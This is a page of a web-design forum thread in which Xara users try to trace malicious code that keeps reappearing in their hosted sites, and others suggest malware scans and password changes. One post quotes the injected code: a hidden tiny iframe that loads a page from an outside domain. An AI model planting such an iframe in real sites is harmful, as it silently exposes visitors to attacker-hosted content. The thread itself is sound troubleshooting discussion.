Welcome to TalkGraphics.com
Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17
  1. #11
    Join Date
    May 2013
    Location
    Australia
    Posts
    8

    Default Re: Locating hidden exploit code within a home page design

    No, I am using Xara to upload directly to the Web Server. The problem has not re-appeared since I manually deleted the files on the server etc. so at this point, fingers crossed, I think I may have put a stop to this!

  2. #12
    Join Date
    Oct 2004
    Posts
    19

    Default Re: Locating hidden exploit code within a home page design

    I've had the same thing happen to my sites and posted back in February about the same issue. I've contacted my webhost, WebHero, and they attribute the exploit code to my software (Xara). It reports in Avast that is roe.js and sends it to my security chest.
    I'm not using filezilla and I've changed my password, so my account has not been hacked.
    Here is the code that is reported as malicious code:
    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thetallytype.com/ecaf.html?i=1513991>
    I'm not sure if I pasted enough info for any help, but I've redone several websites and they eventually end up with malicious code, just different website in the code.

  3. #13

    Default Re: Locating hidden exploit code within a home page design

    Quote Originally Posted by coachjimgil View Post
    ...they attribute the exploit code to my software (Xara). It reports in Avast that is roe.js and sends it to my security chest.
    I'm not using filezilla and I've changed my password, so my account has not been hacked.
    Extremely unlikely, unless your PC is infecting roe.js before publishing.
    roe.js is safe javascript to help IE6 deal with PNG transparency.

    Your site URL above throws up much more dangerous warnings about infecting 46 domains.
    Personally, I would clear my hosting space and ask my host to check for hidden files that you may not see even using Filezilla to check all files on the server.
    I would at least scan my PC using Malwarebytes in safemode then reboot to normal mode and republish my site.
    Attached Thumbnails Attached Thumbnails Click image for larger version. 

Name:	2013-06-16_154622.jpg 
Views:	72 
Size:	56.2 KB 
ID:	96685   Click image for larger version. 

Name:	2013-06-16_154808.jpg 
Views:	73 
Size:	132.4 KB 
ID:	96686  


  4. #14

    Default Re: Locating hidden exploit code within a home page design

    Sorry, mixed my JSs up
    roe.js is the Roll Over Effects javascript.

    png.js is the script for transparencies..

    In any case, if roe.js was a malicious script, there would have been bazillions of reports by now.

  5. #15
    Join Date
    Oct 2004
    Posts
    19

    Default Re: Locating hidden exploit code within a home page design

    I've scanned my computer several times with malware bytes, ms security essentials, trend micro house call, avast av, avg av, and others with nothing found. After I upload a page, it will be fine and then a couple days later it is infected. I had several websites that I haven't touched in years and they were infected. Webhero explained that a web bot was used to attack java script and that's how it becomes affected. They keep telling me to update my web page software. I have the latest update to ver9 and not sure what else to do if I continue using xara.

  6. #16

    Default Re: Locating hidden exploit code within a home page design

    They're buck passing...

    I'd recommend changing your FTP password though.

  7. #17
    Join Date
    Aug 2007
    Location
    Maghull UK
    Posts
    6,202

    Default Re: Locating hidden exploit code within a home page design

    If it was Xara causing the problem I suspect other people would have reported it ;-)
    JOHN -XaReg (FB) XaReg (DB - ignore prompt to register)
    Windows 10 [Anniversary] pro Intel Pentium CPU G630 @ 2.70Ghz RAM: 4 GB; 64-bit x64

 

 

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •